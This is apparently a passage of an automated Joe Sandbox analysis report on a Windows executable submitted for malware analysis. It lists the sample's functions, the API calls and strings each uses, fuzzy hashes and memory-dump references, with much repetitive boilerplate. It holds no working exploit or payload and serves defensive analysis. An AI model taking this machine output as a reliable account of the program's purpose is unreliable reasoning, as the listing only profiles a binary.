                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                                                                                                                                                                                                                                                                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                                                                                                                                                                                                                                                                                                                                                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004301D0
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3969911579-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1965227024-3771769585
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: SendString$_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 369157077-1007645807
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32 ref: 00445BF8
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00445C33
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00445C4F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3125838495-3381328864
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                                                                                                                                                                                                                                                                                                                                                                                • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CharNext
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1350042424-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 004787E5
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3052893215-2127371420
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 0045E7F7
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 0045E8B3
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 0045E8D7
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2295938435-2354261254
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %.15g$0x%p$False$True
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3038501623-2263619337
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: fa1d6aa92a1fd950598fc85aadec7cc4031e0e4106e2d0b6ea716c15020f9163
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa1d6aa92a1fd950598fc85aadec7cc4031e0e4106e2d0b6ea716c15020f9163
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 0045E5F6
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 0045E6A3
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 0045E6C7
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
